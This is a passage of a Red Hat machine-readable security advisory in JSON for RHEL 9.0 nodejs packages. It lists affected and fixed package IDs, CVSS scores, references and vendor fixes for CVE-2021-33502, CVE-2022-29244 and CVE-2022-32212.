"AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-33502" }, { "category": "external", "summary": "RHBZ#1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-33502", "url": "https://www.cve.org/CVERecord?id=CVE-2021-33502" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33502" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539", "url": "https://snyk.io/vuln/SNYK-JS-NORMALIZEURL-1296539" } ], "release_date": "2021-05-21T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-normalize-url: ReDoS for data URLs" }, { "cve": "CVE-2022-29244", "cwe": { "id": "CWE-212", "name": "Improper Removal of Sensitive Information Before Storage or Transfer" }, "discovery_date": "2022-06-20T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2098556" } ], "notes": [ { "category": "description", "text": "A flaw was found in npm. This security issue occurs because the npm pack ignores root-level \".gitignore\" and \".npmignore\" file exclusion directives when run in a workspace or with a workspace flag (for example, --workspaces, --workspace=\u003cname\u003e). Anyone who has run \u0027npm pack\u0027 or \u0027npm publish\u0027 inside a workspace has published files into the npm registry they did not intend to include. This flaw exposes sensitive information to an unauthorized user or an attacker.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-29244" }, { "category": "external", "summary": "RHBZ#2098556", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2098556" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-29244", "url": "https://www.cve.org/CVERecord?id=CVE-2022-29244" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-29244", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29244" }, { "category": "external", "summary": "https://github.com/npm/cli/security/advisories/GHSA-hj9c-8jmm-8c52", "url": "https://github.com/npm/cli/security/advisories/GHSA-hj9c-8jmm-8c52" } ], "release_date": "2022-06-13T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace" }, { "acknowledgments": [ { "names": [ "Axel Chong" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2022-32212", "cwe": { "id": "CWE-703", "name": "Improper Check or Handling of Exceptional Conditions" }, "discovery_date": "2022-07-08T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2105422" } ], "notes": [ { "category": "description", "text": "A vulnerability was found in NodeJS, where the IsAllowedHost check can be easily bypassed because IsIPAddress does not properly check if an IP address is invalid or not. When an invalid IPv4 address is provided (for instance, 10.0.2.555 is provided), browsers (such as Firefox) will make DNS requests to the DNS server. This issue provides a vector for an attacker-controlled DNS server or a Man-in-the-middle attack (MITM) who can spoof DNS responses to perform a rebinding attack and then connect to the WebSocket debugger allowing for arbitrary code execution on the target system.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: DNS rebinding in --inspect via invalid IP addresses", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue is a bypass of CVE-2021-22884.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-32212" }, { "category": "external", "summary": "RHBZ#2105422", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2105422" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-32212", "url": "https://www.cve.org/CVERecord?id=CVE-2022-32212" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-32212", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32212" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/july-2022-security-releases/" } ], "release_date": "2022-07-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", 